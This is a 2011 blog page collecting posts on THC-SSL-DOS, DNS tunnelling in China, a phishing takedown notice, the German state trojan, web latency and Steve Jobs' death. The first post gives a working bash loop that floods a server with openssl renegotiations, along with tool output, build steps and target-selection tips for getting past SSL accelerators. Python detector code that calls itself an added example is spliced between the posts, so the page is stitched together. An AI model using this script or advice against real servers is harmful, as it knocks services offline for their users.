macbroadcast's blog

Tool lets low-end PC crash much more powerful webserver
October 24, 2011, 6:40 pm
Filed under: Hacking, linux

SSL-DOS released. Some organizations already found out about this release a while ago and mistakenly identified it as an SSL-RENEGOTIATION BUG. This is not true. The tool can be modified to work without SSL-RENEGOTIATION by just establishing a new TCP connection for every new handshake.

2011-OCT-24: News Articles:


People are asking us about the private release that works against servers that do not support SSL renegotiation. We will not release it. Meanwhile the good news is that openssl can be used to perform the same attack. It's not as elegant as the private thc-ssl-dos but works quite well indeed. 2 simple commands in bash:

—–BASH SCRIPT BEGIN—–
thc-ssl-dosit() { while :; do (while :; do echo R; done) | openssl s_client -connect 2>/dev/null; done }
for x in `seq 1 100`; do thc-ssl-dosit & done


THC-SSL-DOS is a tool to verify the performance of SSL. Establishing a secure SSL connection requires 15x more processing power on the server than on the client. THC-SSL-DOS exploits this asymmetric property by overloading the server and knocking it off the Internet. This problem affects all SSL implementations today. The vendors have been aware of this problem since 2003 and the topic has been widely discussed. This attack further exploits the SSL secure Renegotiation feature to trigger thousands of renegotiations via a single TCP connection.

Download: Windows binary:

Unix Source : thc-ssl-dos-1.4.tar.gz

Use “./configure; make all install” to build.

Usage: ./thc-ssl-dos 443
Handshakes 0 [0.00 h/s], 0 Conn, 0 Err
Secure Renegotiation support: yes
Handshakes 0 [0.00 h/s], 97 Conn, 0 Err
Handshakes 68 [67.39 h/s], 97 Conn, 0 Err
Handshakes 148 [79.91 h/s], 97 Conn, 0 Err
Handshakes 228 [80.32 h/s], 100 Conn, 0 Err
Handshakes 308 [80.62 h/s], 100 Conn, 0 Err
Handshakes 390 [81.10 h/s], 100 Conn, 0 Err
Handshakes 470 [80.24 h/s], 100 Conn, 0 Err

Comparing flood DDoS vs. SSL-Exhaustion attack:

A traditional flood DDoS attack cannot be mounted from a single DSL connection. This is because the bandwidth of a server is far superior to the bandwidth of a DSL connection: A DSL connection is not an equal opponent to challenge the bandwidth of a server. This is turned upside down for THC-SSL-DOS: The processing capacity for SSL handshakes is far superior at the client side: A laptop on a DSL connection can challenge a server on a 30Gbit link. Traditional DDoS attacks based on flooding are suboptimal: Servers are prepared to handle large amounts of traffic and clients are constantly sending requests to the server even when not under attack. The SSL-handshake is only done at the beginning of a secure session and only if security is required. Servers are _not_ prepared to handle large numbers of SSL handshakes. The worst attack scenario is an SSL-Exhaustion attack mounted from thousands of clients (SSL-DDoS).

Tips & Tricks for whitehats

1. The average server can do 300 handshakes per second. This would require 10-25% of your laptop's CPU.
2. Use multiple hosts (SSL-DOS) if an SSL Accelerator is used.
3. Be smart in target acquisition: The HTTPS Port (443) is not always the best choice. Other SSL enabled ports are more unlikely to use an SSL Accelerator (like the POP3S, SMTPS, … or the secure database port).

Countermeasures: No real solution exists. The following steps can mitigate (but not solve) the problem:

1. Disable SSL-Renegotiation
2. Invest into SSL Accelerator

Either of these countermeasures can be circumvented by modifying THC-SSL-DOS. A better solution is desirable. Somebody should fix this.

Yours sincerely,
The Hackers Choice
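A defender-side check for the two signals the release above describes (a high handshake rate from one client, and thousands of renegotiations over a single TCP connection). This is an added example, not THC code or any vendor's implementation; the handshake-log format, the per-second and per-connection thresholds, and the sample addresses are assumptions, and the log lines are constructed.

```python
"""Flag clients whose SSL handshake or renegotiation pattern looks like exhaustion."""
import re
from collections import Counter

# Assumed log format (one line per handshake or renegotiation; ts at 1-second resolution).
LINE_RE = re.compile(
    r"^(?P<ts>\S+) src=(?P<src>\S+) conn=(?P<conn>\d+) event=(?P<ev>handshake|renegotiation)$")


def detect_exhaustion(lines, max_hs_per_sec=50, max_reneg_per_conn=10):
    """Return {src: [reasons]} for sources exceeding either assumed threshold."""
    per_src_sec = Counter()   # (src, second) -> handshakes, renegotiations included
    per_conn = Counter()      # conn id -> renegotiations on that one TCP connection
    conn_src = {}             # conn id -> source address
    for line in lines:
        m = LINE_RE.match(line.strip())
        if not m:
            continue
        per_src_sec[(m["src"], m["ts"])] += 1
        if m["ev"] == "renegotiation":
            per_conn[m["conn"]] += 1
            conn_src[m["conn"]] = m["src"]
    alerts = {}
    for (src, sec), n in per_src_sec.items():
        if n > max_hs_per_sec:
            alerts.setdefault(src, []).append(f"{n} handshakes at {sec}")
    for conn, n in per_conn.items():
        if n > max_reneg_per_conn:
            alerts.setdefault(conn_src[conn], []).append(f"{n} renegotiations on conn {conn}")
    return alerts


def constructed_sample():
    """Constructed log lines (not captured traffic): two normal clients plus one
    client that keeps a single connection open and renegotiates 80 times in a second."""
    lines = ["2011-10-24T18:40:00 src=192.0.2.10 conn=1 event=handshake",
             "2011-10-24T18:40:00 src=192.0.2.11 conn=2 event=handshake",
             "2011-10-24T18:40:01 src=192.0.2.10 conn=1 event=renegotiation",
             "2011-10-24T18:40:01 src=198.51.100.7 conn=3 event=handshake"]
    lines += ["2011-10-24T18:40:01 src=198.51.100.7 conn=3 event=renegotiation"] * 80
    return lines


if __name__ == "__main__":
    for src, reasons in detect_exhaustion(constructed_sample()).items():
        print(src, "->", "; ".join(reasons))
```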

October 23, 2011, 9:41 pm
Filed under: Big Brother, DNS, Hacking

Source (in German)

China Telecom (CT) wants to prevent VPN use that bypasses the authentication and sign-up process of its wireless network offering. At an expert meeting on DNS held in Rome by the Global Cyber Security Center (GCSC), the Internet Corporation for Assigned Names and Numbers (ICANN) and the DNS Operations, Analysis and Research Center (OARC), Ziqian Liu, an engineer at China Telecom, presented his analysis of the "tricks" of Loopc VPN, which tunnels IP data through the Domain Name System (DNS).

Liu said he became aware of the software through reports from southern China; it is offered on the Chinese online shopping portal Taobao and was developed to use the wireless networks of the market leaders. Loopc VPN gives buyers unrestricted internet access through China Telecom and China Mobile hotspots for a monthly fee.

The concept of IP over DNS has been known for more than ten years. It presupposes that you have a domain of your own and a server for it running on the Internet. On the client side the concept works even in an isolated network, as long as there is a DNS server that resolves foreign domain names on the Internet.

In the simplest implementation, the request is hidden in the queried hostname. When the full server name is requested from the DNS server on the local network, that server searches its cache first. Since it finds nothing, it starts asking, recursively, until it reaches the DNS server responsible for tunnel.example.com, which answers it and thereby has the request delivered to it.

That server also acts as the tunnel endpoint: it decodes the actual request from the hostname, fetches the user data from the Internet and sends it back, for example as a TXT record in the DNS response. The client picks it up and passes it on to applications such as the browser. Open-source software uses this technique.

The China Telecom engineer's analysis of the scenario explains how Loopc VPN tunnels connections through the provider's network. The software uses the process described above. In addition, unlike other software, Loopc VPN works with several different target domains and tunnel-endpoint DNS servers, and the tunnel endpoint marks its answers to the Loopc VPN client's queries with a DNS error, which apparently prevents them from being cached by China Telecom's DNS servers.

As a countermeasure, the China Telecom engineers use a method called "suffix matching / request frequency counting" (SM/RFC): it identifies the process by the number of queries for a suspicious domain within a certain period, once this exceeds a certain value. Large providers such as Baidu are excluded via a whitelist. Liu did not comment on whether China Telecom is taking other than technical measures against Loopc VPN. The Loopc VPN package is currently still available on the Taobao website.

What is presented from an engineering point of view as protecting one's own infrastructure against "freeriders" is not good news for those who want unsupervised and unfiltered access in China. Loopc VPN apparently levers out the provider's filtering mechanism; whether it also bypasses the filtering and blocking of the Great Firewall ("Golden Shield") is currently unclear. Asked to what extent Loopc could enter the next round of the arms race by changing domains rapidly, Liu replied that IP-over-DNS tunnels absolutely need a couple of stable domains.

Incidentally, the DNS experts at the meeting itself had to battle the filtering practices of the Italian conference network operator: they had to switch off DNSSEC validation on their devices in order to reach the WLAN login page. Many workshop participants also spent a lot of time trying to find gaps among the many blocked ports for their own VPN software. (Monika Ermert)
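The "suffix matching / request frequency counting" idea from the article, worked through as an added example (not China Telecom's implementation and not from the page): queries are grouped by the registrable-domain suffix, counted per time window together with the number of distinct names under that suffix, and flagged above a threshold unless the suffix is whitelisted. The log format, the two-label suffix rule, the window, the thresholds and the sample lines are all assumptions.

```python
"""Suffix matching / request frequency counting (SM/RFC) over constructed DNS query logs."""
import re
from collections import defaultdict

# Assumed log format: "<epoch seconds> <client ip> <qname> <qtype>"
LINE_RE = re.compile(r"^(?P<ts>\d+) (?P<client>\S+) (?P<qname>\S+) (?P<qtype>\S+)$")
WHITELIST = {"baidu.com"}   # large providers excluded, as the article describes


def suffix_of(qname, labels=2):
    """Registrable-domain suffix: the last `labels` labels (two-label rule is an assumption)."""
    parts = qname.rstrip(".").lower().split(".")
    return ".".join(parts[-labels:])


def detect_tunnels(lines, window=60, max_queries=100, max_distinct=50):
    """Return {suffix: (queries, distinct_names)} for suffixes that exceed either
    limit inside some `window`-second bucket; whitelisted suffixes are skipped."""
    counts = defaultdict(lambda: defaultdict(int))        # suffix -> bucket -> queries
    names = defaultdict(lambda: defaultdict(set))         # suffix -> bucket -> distinct qnames
    for line in lines:
        m = LINE_RE.match(line.strip())
        if not m:
            continue
        sfx = suffix_of(m["qname"])
        if sfx in WHITELIST:
            continue
        bucket = int(m["ts"]) // window
        counts[sfx][bucket] += 1
        names[sfx][bucket].add(m["qname"].lower())
    alerts = {}
    for sfx, per_bucket in counts.items():
        for bucket, n in per_bucket.items():
            distinct = len(names[sfx][bucket])
            if n > max_queries or distinct > max_distinct:
                alerts[sfx] = (n, distinct)
    return alerts


def constructed_sample():
    """Constructed lines: ordinary lookups, a heavily queried whitelisted domain,
    and one client encoding data in 120 distinct labels under a single suffix."""
    lines = ["1319481600 10.0.0.5 www.baidu.com A",
             "1319481601 10.0.0.5 mail.example.org MX"]
    lines += ["1319481602 10.0.0.7 www.baidu.com A"] * 150
    lines += [f"131948{1600 + i % 30} 10.0.0.9 d{i:04x}.tunnel.example.com TXT" for i in range(120)]
    return lines
```

Real tunnels also show up as unusually long labels and a skew towards TXT or NULL queries; those signals are not part of SM/RFC as the article describes it and are left out here.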

iodine lets you tunnel IPv4 data through a DNS server


New server , new luck…..
October 23, 2011, 3:21 am
Filed under: fraud, infografic, linux, phishing, society, Wordpress

Since some folks tried to hack my webserver and phish Facebook accounts (see left screenshot; the PHP script is linked with the image), uploaded banking malware from the Royal Bank of Canada and the Citizenbank (see screenshot below) via a WordPress vulnerability onto my webserver, and I had several hacking attempts, my server was used for a few outgoing DDoS attacks (see screenshots below).

Subject: Fraudulent site, please shut down! [RBC 11217] IP: Domain:
Date: Fri, 1 Jul 2011 04:23:45 +0300
From: <>

Dear Sirs:

RSA, an anti-fraud and security company, is under contract to assist Royal Bank of Canada and its related entities ("RBC") – a leading Canadian bank – in preventing or terminating online activity that targets RBC's clients as potential fraud victims.

RSA has been made aware that you appear to be providing Internet services to a fraudulent Web site, which is part of a "phishing scam"*. This activity violates RBC's copyright, trademark and other intellectual property rights and may violate the criminal laws of Canada, the United States and other nations.

E-mail messages have been broadly distributed to individuals by a person or entity pretending to be RBC. These e-mails use RBC's name and identity (including trademarks) without authorization. The e-mails request recipients to verify and submit sensitive details related to their RBC

Within the fraudulent e-mail message, there is a link that leads the recipients to a fraudulent website displaying RBC's copyrighted materials and trademarks. The fraudulent website is located at the following URL address

which you provide services and which is under your control.

The fraudulent website not only represents a misuse of RBC's intellectual property; its purpose is to improperly obtain personal information of RBC customers in order to fraudulently access their bank accounts. The people behind those websites typically perpetrate identity-theft related activities, such as using customers' credit cards or bank accounts without authorization. In addition, since the vast majority of all of the e-mails are not being sent to actual RBC customers, the actions serve to damage the reputation and image of RBC.

Please take all necessary steps to immediately shut down the fraudulent website, terminate its availability to the Internet and discontinue the transmission of any e-mails associated with this website.

We understand that you may not be aware of this improper use of your services and we appreciate your cooperation. We specifically would ask that you also take the following actions:

• Please provide us with a tar/zip file of the source code for this site, so that we may analyze it to help prevent further attacks.
• If any customer data has been captured that is stored on your systems or equipment, please send us that data so that the customers to whom that data relates can be notified and take steps to protect their credit.
• Please provide a copy of any records you maintain that indicate the name, contact information, method of payment or similar information that may be useful in helping learn the identity and location of the customer for whom the website has been operated.

Thank you for your cooperation to prevent and terminate this fraudulent

RSA Anti Fraud Command Center
Tel: +44(0)800-032-7751 (UK)
Tel: +1-866-408-7525 (US)
Tel: + 1-800-406-8651 (CA)
Fax: +972-9-9728101 (EU)
Fax: +1-212-208-4644 (US)

For more information about RSA's AFCC _

cc: Royal Bank of Canada
Computer Security Incident Response Team, RBC Information Security
Address: 315 Front St. W. – 13th Flr, Toronto, Ontario M5V 3A4
Tel: +1 – 416-348-4498
Fax: +1 – 416-348-2751
Email: CSIRT@rbc.com

* "Phishing" is an e-mail scam that attempts to trick consumers into revealing personal information, such as their credit or debit account numbers, checking account information, Social Security Numbers, or banking account passwords, through an imposter's Web site or in a reply


NSA Chief: China Behind RSA Attacks

Chinese steal a “great deal” of military-related intellectual property, and were responsible for last year’s attacks on cybersecurity company RSA, Gen. Keith Alexander tells Senators.



The Watergate of German media politics – backdoor Trojan used by the German police force
October 9, 2011, 5:16 pm
Filed under: Big Brother, globalchange, Hacking, howto, socialweb, society

via Spiegelfechter and Netzpolitik; English version via Naked Security

The famous Chaos Computer Club (CCC) has announced the discovery of a backdoor Trojan horse capable of spying on online activity and recording Skype internet calls which, it says, is used by the German police force.

The malware – which has been variously dubbed “0zapftis”, “Bundestrojaner” or “R2D2” – is likely to kick up a political storm, if the allegations are true.

The federal Trojan can in fact do considerably more. It is true that in its "basic version" it only follows the requirements. But, in keeping with its nature as a Trojan, it can be upgraded arbitrarily afterwards, without any oversight. Through the installed Trojan, further files, indeed entire programs, can be loaded onto the infected computer at any time.


German government accused of spying on citizens with state-sponsored Trojan

Summary: A well-established group of German hackers has accused the German government of releasing a backdoor Trojan into the wild. Security firm F-Secure has confirmed that the program includes a keylogger and code that can take screenshots and record audio.


Hackers from the Chaos Computer Club on Sunday said the German government's controversial spy software contained dangerous security flaws while allowing potentially illegal activity.

It can also access the microphone, keyboard and other systems of the PC. This means that ultimately the entire computer and its surroundings (via the microphone) are open to the investigators. They can even read out all passwords, from a GMX account to online banking, by recording keystrokes; any encryption would become pointless. They can have received mails forwarded to themselves and upload files, entirely at their discretion. Because the Trojan contains all these functions, contrary to (it has to be said again) the explicit requirements of the Federal Constitutional Court (BVerfG).

UPDATE via gulli: Several journalists now suspect that the analysed software is the so-called "Bayerntrojaner" (Bavarian Trojan). Blogger Markus Beckedahl of the blog "netzpolitik" reports: "There is a first front runner among the federal states in the search for who used the federal/state Trojan illegally. Both Erich Moechl at FM4 and tomorrow's Frankfurter Rundschau point to Bavaria. […] Erich Moechl refers to documents of the company Digitask from Hesse, which have been on Wikileaks since 2008. Digitask offers the matching software, which fulfils all the specifications the CCC discovered." The Frankfurter Rundschau voices the same suspicion. Definitive proof of the assumed authorship of the Trojan is, however, still lacking.

Lawblog; more info at Wikileaks.



Federal Trojan’s got a “Big Brother”

Beating the speed of light on the web
October 9, 2011, 10:31 am
Filed under: Decentralization, DNS, freedombox, globalchange, Hacking, howto, ipv6, linux

by Dave Täht

I started writing this piece this morning to talk about two things – bandwidth – which is pretty well understood – and latency, which is not – in the context of getting better performance out of humanity’s synergistic relationship with web based applications.
The problem is the speed of light!

“For a successful technology, reality must take precedence over public relations, for nature cannot be fooled.” 

– Richard Feynman

Yesterday, I accidentally introduced a triangular routing situation on my network, which effectively put me on the moon, in time and space, relative to google. I was a good 3+ seconds away from their servers, where normally I’m about 70ms away.

It made clear the source of the latency problems I’d seen while travelling in Australia and in Nicaragua, where google’s servers (in 2008) were over 300ms and 170ms RTT, respectively.

Everybody outside the USA notices the KER… CHUNK of time they lose between a click to web access… and even in the USA this sort of latency is a problem.

Programmers try really, really hard to mask latency – web browsers spawn threads that do DNS lookups asynchronously, they make connections to multiple sites simultaneously, and they try to render as much of the page as possible as it is still streaming, and for all that, the best most web sites can do is deliver their content in a little over half a second, and most are adding additional layers of redirects and graphical gunk that make matters worse – and all they are doing, is trying to mask the latency that is unavoidable.

1955 – 2011 R.I.P. Steve Jobs, Apple co-founder, dies at 56
October 8, 2011, 12:22 pm
Filed under: Uncategorized

Jobs died at his home on October 5, 2011, due to complications from a rare form of pancreatic cancer. Apple's homepage from October 5, 2011 – present; created in remembrance of Jobs shortly after he had died. Jobs's death was announced by Apple in a statement which read: "We are deeply saddened to announce that Steve Jobs passed away today. Steve's brilliance, passion and energy were the source of countless innovations that enrich and improve all of our lives. The world is immeasurably better because of Steve. His greatest love was for his wife, Laurene, and his family. Our hearts go out to them and to all who were touched by his extraordinary gifts."


Steve Jobs, Apple co-founder, dies at 56

Apple remembering Steve Jobs

"You know Dad, Steve Jobs was to our generation what Alexander Graham Bell and Thomas Edison were to previous generations."

Steve Jobs death: Google, Samsung delay product launches

Funeral Held Friday for Apple Co-Founder Steve Jobs

How Steve Jobs Changed the Story